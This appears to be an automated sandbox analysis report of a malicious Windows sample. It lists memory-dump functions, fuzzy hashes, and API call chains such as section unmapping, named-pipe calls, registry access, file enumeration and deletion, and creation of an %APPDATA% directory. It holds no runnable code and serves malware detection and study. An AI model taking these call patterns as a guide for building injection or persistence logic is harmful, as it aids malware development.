  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
